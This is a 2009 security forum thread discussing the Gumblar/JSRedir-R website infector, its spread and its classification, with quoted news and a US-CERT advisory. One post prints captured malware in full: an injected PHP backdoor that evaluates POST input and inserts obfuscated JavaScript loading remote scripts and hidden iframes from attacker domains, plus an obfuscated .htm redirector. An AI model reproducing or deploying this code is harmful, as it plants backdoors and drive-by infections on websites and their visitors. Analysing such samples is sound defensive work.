|
-
May 16th, 2009, 04:46 PM
#1
JSRedir-R
Nothing terribly special about this website infector other than its phenomenal penetration in a very short space of time:
http://www.telegraph.co.uk/sciencean...y-experts.html
More here:
http://tech.yahoo.com/news/pcworld/2...rgetingmalware
Last edited by nihil; May 16th, 2009 at 05:04 PM.
-
May 18th, 2009, 07:18 PM
#2
So is it an automated attack on web applications? It sounds like a worm is spreading through sql injection and remote file inclusion flaws and this script is the payload. But it doesn't give any detail about what web applications are being hit.
http://www.zone-h.org/mirror/id/8870521
-
May 20th, 2009, 05:45 PM
#3
sigh.. there are still so many servers out there which are infect by automated piece of code.. amazing..
Parth Maniar,
CISSP, CISM, CISA, SSCP
*Thank you GOD* 
Greater the Difficulty, SWEETER the Victory.
Believe in yourself.
-
May 20th, 2009, 07:45 PM
#4
But it doesn't give any detail about what web applications are being hit.
See Nihil's second url/link...
The attack code has largely gone after PDF and Flash flaws discovered in the last year (such as APSA08-01 and APSB08-11), according to the company's spokesperson. Such attacks typically go after browser plugins installed by software and don't require opening or downloading anything, but these particular assaults can be largely neutered by making sure you have the latest versions of the Adobe software.
One of the explanatory blog posts from ScanSafe also describes using old MDAC exploits as well, so be sure you're up to date on Microsoft updates also. The PDF attack approach is more bad news for Adobe, whose programs have become a favorite target of late.
Successful attacks will attempt to install malware that manipulates Google search result pages when viewed by Internet Explorer. Victims may see fake results that will redirect them to fradulent sites. To spread itself further, the malware will also attempt to steal FTP logins and hijack any Web sites controlled by an infected PC.
In God We Trust....Everything else we backup.
-
May 20th, 2009, 07:55 PM
#5
Yes,
US-CERT say this:
Gumblar Malware Exploit Circulating
added May 18, 2009 at 12:47 pm
US-CERT is aware of public reports of a malware exploit circulating. This is a drive-by-download exploit with multiple stages and is being referred to as Gumblar. The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc. The second stage of this exploit occurs when users visit a website compromised by Gumblar. Users who visit these compromised websites and have not applied updates for known PDF and Flash Player vulnerabilities may become infected with malware. This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits. Additionally, this malware may also redirect Google search results for the infected user.
-
May 21st, 2009, 02:59 AM
#6
See Nihil's second url/link
That had absolutely nothing to do with what I was talking about.
The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc.
Agian, it could be someone spreading the exploit on XSSable pages that allow javascript to be posted up. Or it could be a full on worm that spreads via remote file inclusion. They give no detailed information at all about this except for the fact that someone sandwiched together exploits for browser extensions.
-
May 21st, 2009, 09:30 AM
#7
This is neither an XSS exploit nor a worm, and although some pundits describe it as a trojan, it isn't one of those either.
Basically there is a bot that scans the internet looking for vulnerable websites into which it can inject javascript. As no security researcher has yet obtained a copy of this bot, it is unclear what vulnerabilities are being targeted. The speed at which this malware has spread by comparison to its peers would suggest that it uses multiple vulnerabilities.
The second part is pretty straightforward. You visit a compromised website and pick up a drive-by infection.
Apparently the latest version of the bot uses heavily obfuscated javascript which makes each site's infection virtually unique.
-
May 21st, 2009, 12:46 PM
#8
Greetz.
Here's a example of the script that is being used. Prease be careful. 
In other words *DO NOT EVEN BOTHER OPENING "hXXp://yourlitetop.cn" IN YOUR BROWSER*
Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih0KXtldmFsKHVuZXNjYXBlKCgndmFyJjIwYSYzZCYyMlNjJjcyaXB0RW4mNjcmNjluZSYyMiYyYyY2MiYzZCYyMlZlJjcyc2kmNmZuKCYyOSsmMjImMmNqJjNkJjIyJjIyJjJjdSYzZCY2ZWEmNzYmNjlnYXRvciYyZSY3NXNlckFnZW4mNzQmM2JpJjY2KCYyOHUmMmVpbmQmNjV4T2YmMjgmMjImNTdpbiYyMikmM2UwJjI5JjI2JjI2KHUmMmUmNjluZGUmNzhPZigmMjJOVCYyMDYmMjIpJjNjJjMwKSYyNiYyNiYyOCY2NG8mNjN1JjZkZW50JjJlY29va2llJjJlJjY5biY2NCY2NXhPZigmMjJtaWVrJjNkMSYyMikmM2MmMzApJjI2JjI2KCY3NHlwZW8mNjYoeiY3MnYmN2F0JjczKSYyMSYzZHQmNzkmNzAmNjVvJjY2KCYyMiY0MSYyMiYyOSkpJjdienJ2JjdhJjc0cyYzZCYyMkEmMjImM2JldmFsKCYyMmlmKHdpbiY2NG93JjJlJjIyK2EmMmImMjIpJjZhJjNkaismMjIrYSYyYiYyMk1ham9yJjIyK2ImMmJhJjJiJjIyTWkmNmVvciYyMitiK2EmMmImMjJCdWlsZCYyMismNjImMmImMjImNmEmM2ImMjImMjkmM2JkJjZmY3VtZW4mNzQmMmUmNzcmNzJpdGUmMjgmMjImM2MmNzNjcmlwdCYyMHMmNzJjJjNkJjJmJjJmZ3VtYmxhciYyZWNuJjJmJjcyc3MmMmYmM2ZpZCYzZCYyMismNmErJjIyJjNlJjNjJjVjJjJmc2NyaSY3MHQmM2UmMjIpJjNiJjdkJykucmVwbGFjZSh0LCclJykpKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
***ORIGINAL PAGE'S CONTENT REMAINED HERE***
echo "<iframe src=\"http://nyoflak15041F8\" width=1 height=1 style=\"visibility:hidden;position
]
and this in a number of .htm files:
Code:
<script language=javascript><!--
(function(OFJqv){var Sl3='%';var RLE=('va,72,20a,3d,22Sc,72iptEngi,6ee,22,2cb,3d,22Versio,6e()+,22,2cj,3d,22,22,2cu,3d,6eavig,61t,6f,72,2e,75ser,41g,65nt,3bif((u,2e,69nd,65xOf(,22Ch,72ome,22,29,3c0),26,26(,75,2e,69,6ed,65xOf,28,22W,69n,22,29,3e0,29,26,26(u,2eindexOf,28,22N,54,206,22,29,3c0),26,26(document,2eco,6fkie,2eind,65,78Of,28,22miek,3d1,22),3c0),26,26,28ty,70,65of(,7a,72vzts),21,3dtypeof,28,22A,22,29)),7b,7arvzts,3d,22,41,22,3bev,61,6c,28,22i,66(window,2e,22,2ba+,22),6a,3dj+,22+a+,22Maj,6fr,22,2bb+a+,22Min,6fr,22+b+,61+,22B,75ild,22+,62+,22j,3b,22),3b,64o,63ume,6e,74,2ewrite(,22,3cscr,69,70t,20,73,72c,3d,2f,2fm,22+,22artu,7a,2e,63n,2fv,69d,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscri,70t,3e,22,29,3b,7d').replace(OFJqv,Sl3);var lTtZO=unescape(RLE);eval(lTtZO)})(/\,/g);
--></script><body><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>
Last edited by t34b4g5; May 21st, 2009 at 01:11 PM.
-
May 22nd, 2009, 08:06 PM
#9
Hi t34b4g5,
Are you sure? that looks more like an Iframe injection than javascript redirection?
There is an analysis at Unmaskparasites:
http://blog.unmaskparasites.com/2009...jected-script/
And:
http://blog.unmaskparasites.com/2009...mblar-exploit/
JSRedir-F redirected to Grumblar.cn and more recently to Martuz.cn
yourlitetop.cn seems to be associated with Win32.Heur, rather than a JS redirect & browser hijack?
Last edited by nihil; May 22nd, 2009 at 08:13 PM.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote
